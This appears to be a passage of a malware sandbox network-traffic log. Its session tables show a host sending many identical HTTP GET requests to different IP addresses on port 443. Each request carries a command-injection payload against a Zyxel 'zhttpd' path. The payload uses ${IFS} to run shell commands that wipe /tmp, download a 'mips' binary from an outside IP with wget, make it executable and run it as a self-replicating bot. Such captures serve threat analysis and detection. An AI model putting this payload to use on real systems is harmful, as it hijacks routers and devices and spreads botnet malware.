                                        Mar 31, 2024 09:21:23.940371037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4936192.168.2.2332872103.117.170.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940437078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4937192.168.2.2350502191.166.166.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940490961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4938192.168.2.2334462130.151.226.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940562010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4939192.168.2.2336838105.105.154.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940623045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4940192.168.2.2352612151.112.193.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940668106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4941192.168.2.2348842152.46.30.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940725088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4942192.168.2.234436044.180.42.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940800905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4943192.168.2.2355322151.45.207.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940835953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4944192.168.2.2349748107.25.147.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940891981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4945192.168.2.2342042153.139.242.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.940957069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4946192.168.2.2354734121.28.186.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941030025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4947192.168.2.234591292.124.141.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941075087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4948192.168.2.234747466.24.211.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941140890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4949192.168.2.2338862164.174.171.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941195965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4950192.168.2.233611449.8.239.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941272020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4951192.168.2.233341889.119.41.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941323996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4952192.168.2.2357882133.204.16.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941379070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4953192.168.2.234941018.181.189.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941456079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4954192.168.2.235920080.38.156.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941504002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4955192.168.2.2346308103.163.169.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941565990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4956192.168.2.233659018.135.193.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941633940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4957192.168.2.2360852206.10.56.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941674948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4958192.168.2.236015087.36.76.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941750050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4959192.168.2.235928064.248.203.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941802025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4960192.168.2.2354448139.226.164.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941854954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4961192.168.2.235498468.21.19.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941890955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4962192.168.2.2360876176.211.58.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941942930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4963192.168.2.235154860.101.63.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.941992998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4964192.168.2.2336040142.88.224.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942047119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4965192.168.2.235690058.189.234.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942107916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4966192.168.2.2335696161.193.94.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942141056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4967192.168.2.235317637.14.96.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942176104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4968192.168.2.233806814.48.11.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942224026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4969192.168.2.2337374102.91.131.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942282915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4970192.168.2.233757031.183.112.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942313910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4971192.168.2.2342156173.140.170.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942362070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4972192.168.2.235350818.11.51.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942414045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4973192.168.2.235823252.123.160.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942481041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4974192.168.2.2349158116.167.225.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942511082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4975192.168.2.2341516109.121.191.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942581892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4976192.168.2.2348630199.139.209.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942621946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4977192.168.2.23544868.220.64.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942672968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4978192.168.2.2341756150.187.41.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942725897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4979192.168.2.2347428223.22.109.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942790985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4980192.168.2.2357706108.188.136.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942856073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4981192.168.2.2337022189.74.82.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942936897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4982192.168.2.234573280.135.20.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.942991972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4983192.168.2.2346140104.44.72.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943083048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4984192.168.2.2337104153.108.222.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943161011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4985192.168.2.2339302221.190.163.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943229914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4986192.168.2.2336816166.120.181.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943299055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4987192.168.2.2353710179.48.137.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943348885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4988192.168.2.2351824187.127.24.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943419933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4989192.168.2.2340332104.108.70.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943464994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4990192.168.2.233622267.192.210.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943505049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4991192.168.2.234327242.122.37.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943547010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4992192.168.2.2350744131.105.190.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943603992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4993192.168.2.2344804129.199.68.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943664074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4994192.168.2.235811698.157.176.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943744898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4995192.168.2.235331034.13.160.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943804026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4996192.168.2.2334130188.5.166.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.943880081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4997192.168.2.2355776117.18.187.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947381973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4998192.168.2.233842212.149.233.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947438002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4999192.168.2.2350786221.55.62.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947494030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5000192.168.2.2335342128.168.129.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947539091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5001192.168.2.2333580130.157.182.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947585106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5002192.168.2.234400049.250.208.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:24.947629929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5003192.168.2.2355730145.249.104.7443
                                        TimestampBytes transferredDirectionData
